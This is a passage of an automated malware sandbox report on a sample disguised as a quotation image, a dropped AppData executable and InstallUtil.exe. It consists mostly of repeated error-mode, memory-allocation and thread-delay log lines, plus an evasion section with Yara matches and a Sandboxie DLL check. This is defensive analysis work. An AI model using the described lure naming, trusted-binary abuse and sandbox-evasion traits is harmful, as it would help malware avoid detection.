                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Yara match File source: Process Memory Space: RFQ____RM quotation_JPEG IMAGE.img.exe PID: 3148, type: MEMORYSTR
                Source: Yara match File source: Process Memory Space: Gydvapkca.exe PID: 5332, type: MEMORYSTR
                Source: Yara match File source: Process Memory Space: Gydvapkca.exe PID: 6716, type: MEMORYSTR
                Source: RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2089672155.0000000003299000.00000004.00000800.00020000.00000000.sdmp, Gydvapkca.exe, 00000003.00000002.2224812433.00000000023E9000.00000004.00000800.00020000.00000000.sdmp, Gydvapkca.exe, 00000006.00000002.2301023518.0000000002659000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exe Memory allocated: 13D0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exe Memory allocated: 3250000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exe Memory allocated: 3060000 memory reserve | memory write watch
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 1490000 memory reserve | memory write watch
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2E80000 memory reserve | memory write watch
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2DC0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exe Memory allocated: 2210000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exe Memory allocated: 23A0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exe Memory allocated: 43A0000 memory reserve | memory write watch
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 10F0000 memory reserve | memory write watch
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2C80000 memory reserve | memory write watch
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 4C80000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exe Memory allocated: 24F0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exe Memory allocated: 2610000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exe Memory allocated: 4610000 memory reserve | memory write watch
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 900000 memory reserve | memory write watch
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 28E0000 memory reserve | memory write watch
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 10E0000 memory reserve | memory write watch
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599873Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599766Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599656Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599542Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599422Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599313Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599188Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599063Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598938Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598827Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598718Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598578Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598467Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598357Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598250Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598141Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598031Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597922Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597810Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597703Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597594Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597485Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597360Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597235Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597110Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596985Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596860Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596735Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596610Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596485Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596360Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596235Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596109Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595951Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595844Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595688Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595562Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595453Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595344Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595235Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595110Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594985Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594859Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594750Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594641Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594531Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594422Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594313Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594188Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594063Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599750Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599580Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599452Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599279Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599156Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599017Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598905Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598781Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598671Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598553Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598422Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598312Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598202Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598093Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597984Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597872Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597750Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597640Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597531Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597421Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597312Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597202Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597093Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596714Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596608Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596484Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596374Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596265Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596156Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596042Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595911Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595781Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595672Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595551Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595436Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595327Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595203Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595093Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594984Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594875Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594765Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594656Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594523Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594420Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594310Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594062Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593937Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593828Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593718Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593608Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593499Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593375Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599874
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599766
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599656
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599546
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599437
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599064
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598953
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598844
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598719
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598609
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598391
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598281
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598062
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597953
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597844
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597734
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597625
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597516
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597391
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597266
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597156
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597047
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596937
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596815
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596702
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596592
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596478
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596375
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596265
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596156
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596047
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595922
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595812
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595703
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595594
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595469
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595359
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595141
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595031
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594922
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594812
